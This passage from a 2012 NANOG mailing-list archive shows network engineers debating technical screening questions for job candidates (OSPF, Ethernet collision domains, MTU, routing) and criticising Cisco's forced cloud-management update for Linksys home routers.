filtering to separate the candidates that put information in their CV that does not match with the basic requirements for the position. For example: - requirement: strong knowledge in routing protocols (list of protocols, including OSPF) If the person don't know the answer about the LSA type, it is already out and you don't need to alocatte a technical interviewer for that. On the other hand, if the person correct answer the question, it does not mean he or she is a good candidate. But at least you can allocate an tech interviewer to check in details the person's knowledge. And will the person guess all type of basic question he or she can get in the first level of interview ? Well, if the homework was properly, maybe. But then at least you have someone with attitude (preparation for the interview). I agree with who answered that attitude is one important point. If in your organization you can allocate a tech interviewer since the first interview, that IMO will help a lot and it is the best scenario for recruiting. But even though you get a strong technical engineer, you still need to assess his soft skills. Regards On 7/6/12, Scott Weeks wrote: > > --- diogo.montagner at gmail.com wrote:\ > From: Diogo Montagner > > For screening questions (for 1st level filtering), IMO, the questions > has to be straight to the point, for example: > > 1) What is the LSA number for an external route in OSPF? > > This can have two answer: 5 or 7. So, I will accept if the candidate > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > techinical interviewer will chech if the candidate understand the > differences of LSA 5 and 7. > ----------------------------------------------------------- > > > How often do you use this in everyday netgeeking? Asking these > types of questions will assure that you get someone with a vendor > i-drank-the-kool-aid cert because they memorized the answers, but > maybe not the best candidate for the position. However, with some > of today's managers kool-aid certs are looked on as better than an > engineering degree. Go figure... :-( > > scott > > -- Sent from my mobile device ./diogo -montagner JNCIE-M 0x41A From kmedcalf at dessus.com Thu Jul 5 20:46:09 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Thu, 05 Jul 2012 19:46:09 -0600 Subject: Cisco Update In-Reply-To: Message-ID: Significantly faster and with far fewer bugs than the Cisco/Linksys as well. --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org > -----Original Message----- > From: David Hubbard [mailto:dhubbard at dino.hostasaurus.com] > Sent: Thursday, 05 July, 2012 10:56 > To: nanog at nanog.org > Subject: RE: Cisco Update > > Technical users could always just flash DD-WRT onto the device and replace > the Linksys/Cisco firmware; then you have a much more robust system without > any big brother stuff. From jgreco at ns.sol.net Thu Jul 5 20:01:36 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Thu, 5 Jul 2012 20:01:36 -0500 (CDT) Subject: Cisco Update In-Reply-To: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> Message-ID: <201207060101.q6611bIB086234@aurora.sol.net> > I see. > > Replace "local access" control with "let anyone on the internet reconfigure= > the thing". Whoever's idea it was should be p*ssed on, keelhauled, drawn = > and quartered, then burned at the stake. It'll get real interesting when Cisco's cloud database is breached and some weakness in the password encryption is discovered. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From randy_94108 at yahoo.com Thu Jul 5 21:10:32 2012 From: randy_94108 at yahoo.com (Randy) Date: Thu, 5 Jul 2012 19:10:32 -0700 (PDT) Subject: job screening question In-Reply-To: Message-ID: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> --- On Thu, 7/5/12, William Herrin wrote: > From: William Herrin > Subject: Re: job screening question > To: "Jon Lewis" > Cc: "nanog at nanog.org" > Date: Thursday, July 5, 2012, 6:43 PM > On Thu, Jul 5, 2012 at 9:28 PM, Jon > Lewis > wrote: > > You've never (much less recently) seen a customer > misconfigure their end of > > an ethernet handoff such that you end up with duplex > mismatch? Granted, in > > that case, distance is irrelevant...but it is half > half-duplex ethernet :) > > If I was asking an ethernet question, I'd rather ask: > > 1. How do you make a crossover ethernet cable to connect two > switches? > (cross the green and orange pairs) > > 2. What happens if you plug that cable into a pair of > gigabit ethernet > switches? (mdix malfunctions, ports negotiate to 100 full, > on some > poorly implemented switches the mix of straight and crossed > wires > eventually damage the ports so they can no longer do gige) > > Regards, > Bill Herrin Or for that matter, in the absence of auto-MDI/MDIX: 1) when is a straight-through cable *required*? 2) when is a cross-over cable *required*? How about another HR-Question: what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? ./Randy From dedelman at iname.com Thu Jul 5 21:20:58 2012 From: dedelman at iname.com (David Edelman) Date: Fri, 06 Jul 2012 02:20:58 +0000 Subject: job screening question In-Reply-To: <20120705175052.EEEE1F88@resin13.mta.everyone.net> Message-ID: On 7/6/12 12:50 AM, "Scott Weeks" wrote: > > >--- bill at herrin.us wrote: >From: William Herrin > >> 5. What is the reason for the 100m distance limit within an >>ethernet collision domain? > >What's an ethernet collision domain? Seriously, when was the last time >you dealt with a half duplex ethernet? >----------------------------------------- > > >Now if someone answered it that way, I'd definitely be >interested while the HR person would just hang up... > >scott > Anyone who responds that way has at least a notion of collision detection and propagation delay and might actually have a bit of experience in the field, not bad things. Is the next question about exponential back off or regeneration of preamble? --Dave > From valdis.kletnieks at vt.edu Thu Jul 5 21:26:52 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Thu, 05 Jul 2012 22:26:52 -0400 Subject: job screening question In-Reply-To: Your message of "Thu, 05 Jul 2012 18:36:34 -0700." <20120706013634.GA25986@ussenterprise.ufp.org> References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> <20120706013634.GA25986@ussenterprise.ufp.org> Message-ID: <3092.1341541612@turing-police.cc.vt.edu> On Thu, 05 Jul 2012 18:36:34 -0700, Leo Bicknell said: > If any employer thought that was useful knowledge for a job today I > would probably run away, as fast as possible! Only way I'd take that job is with both budget and authority to clean up the mess. However, those kind of things are usually politically messy enough that you don't want to be the FTE who does it - that's what consultants are for. :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From owen at delong.com Thu Jul 5 21:25:52 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 19:25:52 -0700 Subject: job screening question In-Reply-To: <20120705175052.EEEE1F88@resin13.mta.everyone.net> References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> Message-ID: <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> On Jul 5, 2012, at 5:50 PM, Scott Weeks wrote: > > > --- bill at herrin.us wrote: > From: William Herrin > >> 5. What is the reason for the 100m distance limit within an ethernet collision domain? > > What's an ethernet collision domain? Seriously, when was the last time > you dealt with a half duplex ethernet? > ----------------------------------------- > > > Now if someone answered it that way, I'd definitely be > interested while the HR person would just hang up... > > scott +1 -- That would be a perfectly valid answer and one of the list of answers I would actually give to HR. Owen From owen at delong.com Thu Jul 5 21:30:04 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 19:30:04 -0700 Subject: job screening question In-Reply-To: <34255.1341537452@turing-police.cc.vt.edu> References: <34255.1341537452@turing-police.cc.vt.edu> Message-ID: On Jul 5, 2012, at 6:17 PM, valdis.kletnieks at vt.edu wrote: > On Thu, 05 Jul 2012 15:05:01 -0600, Derek Andrew said: >> Isn't MTU discovery on IP and not TCP? > > AIX actually supported PMTUD for UDP. Not sure if it still does. Yes, it was > bizarro even for AIX. No, I'm not aware of any actual UDP applications that > were able to do anything useful with this info. ;) > Think IPSEC NAT Traversal over UDP and/or Teredo. (Yes, Teredo is ugly and should be banned from any legitimate network, but...) Owen From owen at delong.com Thu Jul 5 21:29:14 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 19:29:14 -0700 Subject: job screening question In-Reply-To: References: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com> Message-ID: <38A4FCED-2242-40E9-BF64-304B987CA5C5@delong.com> On Jul 5, 2012, at 6:09 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 7:01 PM, Randy wrote: >> --- On Thu, 7/5/12, William Herrin wrote: >>> The less precise answer, path MTU discovery breaks, is just >>> fine. >> >> Precisely! and if I understand correctly, a non-techinical person >> within HR is expected to hear this answer and relay it to you? >> That is more than a long shot. Unless of course they have >> photographic memories, are great typists or perhaps do >> "short hand". > > So I get a garbled answer about disk fragmentation. I can't tell the > difference between an answer garbled in transit and an answer that was > flat wrong to begin with? > I suspect this was a candidate answer about "Packet Fragmentation" (e.g. the answer you were looking for) and that your HR might have translated "packet" into "disk" because that's the only place they've heard of fragmentation. > The point of the question is to help me decide which people I want to > spend half an hour on the phone with and which ones get a polite > thank-you-not-it from HR while I do the parts of my job that don't > involve interviewing folks. If there's any doubt about whether they > belong in the not-it category, they proceed to the phone interview. Makes sense, but, the example garbled answer you provided seems entirely legitimate to me. > > Regards, > Bill Herrin > > P.S. Yes, I got an answer about "degrading DNS port unreachables and > MTU disk fragmenting as well." I asked HR to set up a phone interview. > If that wasn't an HR garble, I *really* want to hear the explanation. > :D > Yep... Pretty sure that everything you listed here so far would be an HR garble of a legitimately correct (within your parameters) answer. Owen From dedelman at iname.com Thu Jul 5 21:33:49 2012 From: dedelman at iname.com (David Edelman) Date: Fri, 06 Jul 2012 02:33:49 +0000 Subject: job screening question In-Reply-To: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: On 7/6/12 2:10 AM, "Randy" wrote: >--- On Thu, 7/5/12, William Herrin wrote: > >> From: William Herrin >> Subject: Re: job screening question >> To: "Jon Lewis" >> Cc: "nanog at nanog.org" >> Date: Thursday, July 5, 2012, 6:43 PM >> On Thu, Jul 5, 2012 at 9:28 PM, Jon >> Lewis >> wrote: >> > You've never (much less recently) seen a customer >> misconfigure their end of >> > an ethernet handoff such that you end up with duplex >> mismatch? Granted, in >> > that case, distance is irrelevant...but it is half >> half-duplex ethernet :) >> >> If I was asking an ethernet question, I'd rather ask: >> >> 1. How do you make a crossover ethernet cable to connect two >> switches? >> (cross the green and orange pairs) >> >> 2. What happens if you plug that cable into a pair of >> gigabit ethernet >> switches? (mdix malfunctions, ports negotiate to 100 full, >> on some >> poorly implemented switches the mix of straight and crossed >> wires >> eventually damage the ports so they can no longer do gige) >> >> Regards, >> Bill Herrin > > >Or for that matter, in the absence of auto-MDI/MDIX: > >1) when is a straight-through cable *required*? >2) when is a cross-over cable *required*? > >How about another HR-Question: > >what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? > >./Randy > My favorite screening question at the moment is: What does a NULL-Route for 169.254.0.0/16 not fix on a Cisco router? Answer - Compliance with RFC 3927 because it doesn't fix the problem of a link-local source address. Answers that also mention proxy-ARP result in immediate interviews. --Dave From bill at herrin.us Thu Jul 5 21:36:28 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 22:36:28 -0400 Subject: job screening question In-Reply-To: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> References: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: On Thu, Jul 5, 2012 at 10:10 PM, Randy wrote: > How about another HR-Question: > > what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? Override the dynamic (e.g. DHCP) default route. Often so you can implement a workaround that central Network Security wouldn't approve of. :-) Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From owen at delong.com Thu Jul 5 21:37:02 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 19:37:02 -0700 Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: On Jul 5, 2012, at 6:28 PM, Jon Lewis wrote: > On Thu, 5 Jul 2012, William Herrin wrote: > >> On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote: >>> I would use questions such as the following: >>> >>> 1. How many end-sites can be numbered from a single /32. >>> (Correct answers: IPv4 - 1, IPv6 - 65,536) >> >> IPv6 - 16,777,216 to 268,435,456 :p >> I'd accept those if I was willing to send the candidate to rational IPv6 networking re-education camp. If I expected the candidate to be able to do real work immediately, I would require the correct answer as specified above. Assigning a /56 to an end-site is bad juju. Assigning a /60 is pure useless evil. >> >>> 5. What is the reason for the 100m distance limit within an ethernet collision domain? >> >> What's an ethernet collision domain? Seriously, when was the last time >> you dealt with a half duplex ethernet? > > You've never (much less recently) seen a customer misconfigure their end of an ethernet handoff such that you end up with duplex mismatch? Granted, in that case, distance is irrelevant...but it is half half-duplex ethernet :) Either way, the collision domain itself is irrelevant to the question at hand... The important thing is to find out that the candidate understands what an ethernet pre-amble is and why it is important. Owen From jared at puck.nether.net Thu Jul 5 21:54:13 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 22:54:13 -0400 Subject: job screening question In-Reply-To: References: Message-ID: Long long time ago I was asked a good one: is ospf TCP or udp. Thankfully I knew the answer. On Jul 5, 2012, at 7:20 PM, Diogo Montagner wrote: > 1) What is the LSA number for an external route in OSPF? From jared at puck.nether.net Thu Jul 5 22:00:27 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 23:00:27 -0400 Subject: job screening question In-Reply-To: <20120705164836.EEEE1921@resin13.mta.everyone.net> References: <20120705164836.EEEE1921@resin13.mta.everyone.net> Message-ID: <5199ACAC-E043-4704-BFFD-EEEB7B9CB135@puck.nether.net> Agreed. I wouldn't know the answer to this nor do I care.... Not because it's not important and not because i couldn't figure it out, but because it's like asking me to implement the spec.. Now if you asked me about what a bgp marker or mp-nlri looks like I can answer that. Same goes for why ssm, and what multicast groups shouldn't be forwarded off-LAN. (And those that you might want to hack around with an application relay to other LANs). - Jared On Jul 5, 2012, at 7:48 PM, "Scott Weeks" wrote: > How often do you use this in everyday netgeeking? Asking these > types of questions will assure that you get someone with a vendor > i-drank-the-kool-aid cert because they memorized the answers, but > maybe not the best candidate for the position. However, with some > of today's managers kool-aid certs are looked on as better than an > engineering degree. Go figure... :-( From rs at seastrom.com Thu Jul 5 22:04:05 2012 From: rs at seastrom.com (Robert E. Seastrom) Date: Thu, 05 Jul 2012 23:04:05 -0400 Subject: job screening question In-Reply-To: (Diogo Montagner's message of "Fri, 6 Jul 2012 07:20:12 +0800") References: Message-ID: <86obntzj2y.fsf@seastrom.com> Diogo Montagner writes: > For screening questions (for 1st level filtering), IMO, the questions > has to be straight to the point, for example: > > 1) What is the LSA number for an external route in OSPF? > > This can have two answer: 5 or 7. So, I will accept if the candidate > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > techinical interviewer will chech if the candidate understand the > differences of LSA 5 and 7. Frankly, this feels a bit like asking what the 9th byte in an IP header is used for (it's TTL, but who's, uh, counting?) -- "That's why God gave us packet analyzers" should be counted as an acceptable answer. If not, you'll find yourself skipping over plenty of extremely well qualified candidates in favor of those who have crammed recently for some sort of exam in hopes of compensating for their short CV. -r From bill at herrin.us Thu Jul 5 22:05:21 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 23:05:21 -0400 Subject: job screening question In-Reply-To: <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> Message-ID: On Thu, Jul 5, 2012 at 10:25 PM, Owen DeLong wrote: > On Jul 5, 2012, at 5:50 PM, Scott Weeks wrote: >> --- bill at herrin.us wrote: >> From: William Herrin >> >>> 5. What is the reason for the 100m distance limit within an ethernet collision domain? >> >> What's an ethernet collision domain? Seriously, when was the last time >> you dealt with a half duplex ethernet? >> ----------------------------------------- >> >> >> Now if someone answered it that way, I'd definitely be >> interested while the HR person would just hang up... > > +1 -- That would be a perfectly valid answer and one of the list of answers I would actually give to HR. Incidentally, 100m was the segment limit. IIRC the collision domain comprising the longest wire distance between any two hosts was larger, something around 200m for fast ethernet. Essentially, the collision signal caused by receiving the first bit of the overlapping packet had to get back to the sender before the sender finished the 64-byte minimum-size packet. Allow for the speed of light and variances in the electronics and that was the width of the collision domain. Carrier sensing multiple access with collision detection. CSMA/CD. I haven't thought about that in a long time. -Bill -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From bicknell at ufp.org Thu Jul 5 22:26:49 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Thu, 5 Jul 2012 20:26:49 -0700 Subject: job screening question In-Reply-To: References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> Message-ID: <20120706032649.GA28634@ussenterprise.ufp.org> In a message written on Thu, Jul 05, 2012 at 11:05:21PM -0400, William Herrin wrote: > Incidentally, 100m was the segment limit. IIRC the collision domain > comprising the longest wire distance between any two hosts was larger, > something around 200m for fast ethernet. Essentially, the collision Actually it can be much longer, having worked on a longer such ethernet many, many moons ago. The longest spec-complaint, repeated only network looks like: | | Host Segment | + Copper to Fiber Repeater | | 2km fiber, no hosts | + Copper to Fiber Repeater | | Host Segment, with or without hosts | + Copper to Fiber Repeater | | 2km fiber, no hosts | + Copper to Fiber Repeater | | Host Segment | With 10base5, a copper segment can be 500m, so 500+2000+500+2000+500, or 5.5km. With 10base2, a copper segment can be 185m, so 185+2000+185+2000+185, or 4.5km. WIth 10baseT, a copper segment can be 100m, so 100+2000+100+2000+100, or 4.4km. The introduction of fiber repeaters is why folks started to use the broken term "half repeater". This was so folks who learned the rules as "2 repeaters in the path" could deal with the fact that it's actually the 5-4-3 rule, so they called the 4 repeaters two half repeaters. Of course, each repeater could be a multi-port repeater (or a hub in 10baseT speak) and thus have a star configuration off of it in the diagram. Add in a couple of 2 port bridges to reframe things, and it's quite possible to run a layer 2 ethernet that is 10's of km long, and has thousands of hosts on it. There was a day when 3000-4000 hosts on a single layer 2 network at 10Mbps was living large. Thankfully, not anymore. -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From owen at delong.com Thu Jul 5 22:28:01 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 20:28:01 -0700 Subject: job screening question In-Reply-To: References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> Message-ID: On Jul 5, 2012, at 8:05 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 10:25 PM, Owen DeLong wrote: >> On Jul 5, 2012, at 5:50 PM, Scott Weeks wrote: >>> --- bill at herrin.us wrote: >>> From: William Herrin >>> >>>> 5. What is the reason for the 100m distance limit within an ethernet collision domain? >>> >>> What's an ethernet collision domain? Seriously, when was the last time >>> you dealt with a half duplex ethernet? >>> ----------------------------------------- >>> >>> >>> Now if someone answered it that way, I'd definitely be >>> interested while the HR person would just hang up... >> >> +1 -- That would be a perfectly valid answer and one of the list of answers I would actually give to HR. > > Incidentally, 100m was the segment limit. IIRC the collision domain > comprising the longest wire distance between any two hosts was larger, > something around 200m for fast ethernet. Essentially, the collision > signal caused by receiving the first bit of the overlapping packet had > to get back to the sender before the sender finished the 64-byte > minimum-size packet. Allow for the speed of light and variances in the > electronics and that was the width of the collision domain. > It was, but only if the device in between segments provided "retiming" which basically meant collision-handling buffering. The requirement was (IIRC) that the preamble traverse the entire wire so that everyone could hear it and back off before data hit the wire. Bonus points for knowing that a "late collision" describes "hearing" a collision after you started transmitting data. > Carrier sensing multiple access with collision detection. CSMA/CD. I > haven't thought about that in a long time. Heh... It still has its uses, even in human conversations. ;-) Owen From owen at delong.com Thu Jul 5 22:45:20 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 20:45:20 -0700 Subject: job screening question In-Reply-To: <20120706032649.GA28634@ussenterprise.ufp.org> References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com> <20120706032649.GA28634@ussenterprise.ufp.org> Message-ID: <65535B10-CC6B-4F7D-84CB-E3A880A9B1EE@delong.com> > > Add in a couple of 2 port bridges to reframe things, and it's quite > possible to run a layer 2 ethernet that is 10's of km long, and has > thousands of hosts on it. There was a day when 3000-4000 hosts on > a single layer 2 network at 10Mbps was living large. > The bridges terminate the collision domain though not the broadcast domain. That was one reason for specifying a collision domain rather than using terms such as subnet, network, etc. Owen From jj at diamondtech.ca Thu Jul 5 22:47:50 2012 From: jj at diamondtech.ca (Jeff Johnstone) Date: Thu, 5 Jul 2012 20:47:50 -0700 Subject: Cisco Update In-Reply-To: <201207060101.q6611bIB086234@aurora.sol.net> References: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> <201207060101.q6611bIB086234@aurora.sol.net> Message-ID: On Thu, Jul 5, 2012 at 6:01 PM, Joe Greco wrote: > > I see. > > > > Replace "local access" control with "let anyone on the internet > reconfigure= > > the thing". Whoever's idea it was should be p*ssed on, keelhauled, > drawn = > > and quartered, then burned at the stake. > > > It'll get real interesting when Cisco's cloud database is breached and > some weakness in the password encryption is discovered. > > ... JG > What encryption? Web stuff was probably built by a consultant using an open source database store :) Jeff From mysidia at gmail.com Thu Jul 5 23:11:48 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Thu, 5 Jul 2012 23:11:48 -0500 Subject: Cisco Update In-Reply-To: <201207060101.q6611bIB086234@aurora.sol.net> References: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> <201207060101.q6611bIB086234@aurora.sol.net> Message-ID: On 7/5/12, Joe Greco wrote: > It'll get real interesting when Cisco's cloud database is breached and > some weakness in the password encryption is discovered. [snip] Will the users' passwords even matter, if a compromise of the database allows an intruder to make a system-wide change to end users' equipment, such as delivering a compromising configuration change, or a "patched" firmware update that deactivates cloud service and turns them all into botnet nodes under exclusive control of the compromiser ? Hopefully Cisco thought that stuff out, but password encryption weaknesses at least are easily addressed by forcing all users to reset pw, and requiring a proof of physical access to the unit. -- -JH From randy_94108 at yahoo.com Thu Jul 5 23:17:29 2012 From: randy_94108 at yahoo.com (Randy) Date: Thu, 5 Jul 2012 21:17:29 -0700 (PDT) Subject: job screening question In-Reply-To: Message-ID: <1341548249.22747.YahooMailClassic@web181119.mail.ne1.yahoo.com> --- On Thu, 7/5/12, William Herrin wrote: > From: William Herrin > Subject: Re: job screening question > To: "Randy" > Cc: "nanog at nanog.org" > Date: Thursday, July 5, 2012, 7:36 PM > On Thu, Jul 5, 2012 at 10:10 PM, > Randy > wrote: > > How about another HR-Question: > > > > what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes > accomplish? > > Override the dynamic (e.g. DHCP) default route. Often so you > can > implement a workaround that central Network Security > wouldn't approve > of. :-) Yes of course! But NOT the "answer" I am looking for(..and want to hear..) because - 1) having such default-routes "internally" is a terribly-bad/broken idea. I am looking for a "candidate" who can actually say the same and go on to say: "it is a kludge that can be put in place to load-share between two links to upstreams when "budgetary-constraints" prevent us from anything but static-routing - two upstreams terminating on the same router. There You go: So, There are some questions (includes Your original-question) that HR should not be asking. There is a big difference between Engineering-Management and Management-Engineering.....(Morton Thiokol/Challenger is a classic case in point.) Regards, ./Randy > > Regards, > Bill Herrin > > -- > William D. Herrin ................ herrin at dirtside.com? > bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > From sikandar.raman at gmail.com Thu Jul 5 23:36:48 2012 From: sikandar.raman at gmail.com (Ramanpreet Singh) Date: Thu, 5 Jul 2012 21:36:48 -0700 Subject: job screening question In-Reply-To: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> References: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: Aaawwe On Jul 5, 2012 7:10 PM, "Randy" wrote: > --- On Thu, 7/5/12, William Herrin wrote: > > > From: William Herrin > > Subject: Re: job screening question > > To: "Jon Lewis" > > Cc: "nanog at nanog.org" > > Date: Thursday, July 5, 2012, 6:43 PM > > On Thu, Jul 5, 2012 at 9:28 PM, Jon > > Lewis > > wrote: > > > You've never (much less recently) seen a customer > > misconfigure their end of > > > an ethernet handoff such that you end up with duplex > > mismatch? Granted, in > > > that case, distance is irrelevant...but it is half > > half-duplex ethernet :) > > > > If I was asking an ethernet question, I'd rather ask: > > > > 1. How do you make a crossover ethernet cable to connect two > > switches? > > (cross the green and orange pairs) > > > > 2. What happens if you plug that cable into a pair of > > gigabit ethernet > > switches? (mdix malfunctions, ports negotiate to 100 full, > > on some > > poorly implemented switches the mix of straight and crossed > > wires > > eventually damage the ports so they can no longer do gige) > > > > Regards, > > Bill Herrin > > > Or for that matter, in the absence of auto-MDI/MDIX: > > 1) when is a straight-through cable *required*? > 2) when is a cross-over cable *required*? > > How about another HR-Question: > > what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? > > ./Randy > > From randy_94108 at yahoo.com Thu Jul 5 23:39:07 2012 From: randy_94108 at yahoo.com (Randy) Date: Thu, 5 Jul 2012 21:39:07 -0700 (PDT) Subject: job screening question In-Reply-To: Message-ID: <1341549547.81601.YahooMailClassic@web181114.mail.ne1.yahoo.com> --- On Thu, 7/5/12, William Herrin wrote: > From: William Herrin > Subject: Re: job screening question > To: "Randy" > Cc: nanog at nanog.org > Date: Thursday, July 5, 2012, 6:33 PM > > Can you post a sample of the > "answers" you have received; which > > prompted you the ask this question to begin with. > > I've been asking the question in phone interviews for > months. I > couldn't quote them properly but the answers were... > discouraging. No > one beyond ping and traceroute. > > I asked HR last week to start asking the question as a > pre-screen and > forward me the answer. The first one responded "This would > block all > IP traffic." I figured it was time for a sanity check to > make sure the > question was reasonable. > > Regards, > Bill > yes....in that reagard, "resonable". It is a shame that - Noc-Techs; these days are classified as: 1) Network Engineers/Prouction Engineers/Customer Support Engineers/Sr. Tech Support Engineers.... Enough Said. ./Randy From cb.list6 at gmail.com Fri Jul 6 00:13:07 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Thu, 5 Jul 2012 22:13:07 -0700 Subject: Cisco Update In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: In Cisco's defense, perhaps the legalese did not fully communicate the intent of the service. http://blogs.cisco.com/home/update-answering-our-customers-questions-about-cisco-connect-cloud-2/ CB On Jul 5, 2012 8:52 AM, "Mario Eirea" wrote: > > Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for it's consumer level routers. > > http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service > > -Mario Eirea From sgtcasey at gmail.com Fri Jul 6 00:25:11 2012 From: sgtcasey at gmail.com (David Casey) Date: Thu, 5 Jul 2012 23:25:11 -0600 Subject: job screening question In-Reply-To: References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> Message-ID: <6E03AF80-B9DF-4D8C-8CFC-4CCA08065C4A@gmail.com> On Jul 5, 2012, at 18:32, William Herrin wrote: > On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote: >> I would use questions such as the following: >> >> 1. How many end-sites can be numbered from a single /32. >> (Correct answers: IPv4 - 1, IPv6 - 65,536) > > IPv6 - 16,777,216 to 268,435,456 :p > > >> 5. What is the reason for the 100m distance limit within an ethernet collision domain? > > What's an ethernet collision domain? Seriously, when was the last time > you dealt with a half duplex ethernet? Today. Legacy devices still require half-duplex sometimes. Dave From randy at psg.com Fri Jul 6 00:44:12 2012 From: randy at psg.com (Randy Bush) Date: Fri, 06 Jul 2012 14:44:12 +0900 Subject: Cisco Update In-Reply-To: References: <792c02a74c580143bb94ae888421af3a@mail.dessus.com> <201207060101.q6611bIB086234@aurora.sol.net> Message-ID: cisco has recanted on the forced cloud etc randy From mpalmer at hezmatt.org Fri Jul 6 01:18:21 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Fri, 6 Jul 2012 16:18:21 +1000 Subject: job screening question In-Reply-To: <20120705170139.EEEE1B26@resin13.mta.everyone.net> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> Message-ID: <20120706061821.GU2221@hezmatt.org> On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: > > > --- jason at thebaughers.com wrote: > From: Jason Baugher > > Geez, I'd be happy to find someone with a good attitude, a solid work > ethic, and the desire and aptitude to learn. :) > --------------------------------------- > > > Yeah, that. But how do you get those folks through the HR > process to you, so you can decipher their skill/work ethic > level? What can the HR person ask to find out if someone > has these qualities? OSPF LSA type questions will not help. Don't get HR to do that sort of screening. They suck mightily at it. I lack any sort of HR department to get in the way, and I'm glad of it -- I don't see the value in having someone who doesn't know anything about the job get in the way of finding the right person for it. Sure, get 'em to do the scutwork of posting job ads, collating resumes, scheduling things and sending the "lolz no!" responses, but actually filtering? Nah, I'll do that bit thanks. If you have to have HR do a filter call, make it *really* simple, like "What does TCP stand for?" -- sadly, you'll still probably filter out half the applicants for a senior position... - Matt From scott at doc.net.au Fri Jul 6 01:31:19 2012 From: scott at doc.net.au (Scott Howard) Date: Thu, 5 Jul 2012 23:31:19 -0700 Subject: Cisco Update In-Reply-To: References: <201207051524.q65FO9n3079600@aurora.sol.net> <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> Message-ID: On Thu, Jul 5, 2012 at 9:42 AM, Jon Lewis wrote: > Routers are sometimes used on networks that don't have internet > connectivity [by design]. This seems amazingly short-sighted for a company > that's been around selling routing gear as long as cisco. > If the router is not connected to the internet (either due to network design, or just because you ripped out the WAN cable) then it IS able to be managed locally. Plug the Internet back in, and that option goes away. Scott From don at bowenvale.co.nz Fri Jul 6 01:40:17 2012 From: don at bowenvale.co.nz (Don Gould) Date: Fri, 06 Jul 2012 18:40:17 +1200 Subject: job screening question In-Reply-To: References: Message-ID: <4FF68851.1070008@bowenvale.co.nz> Ok, so I read over Williams OP... I have 25 years IT 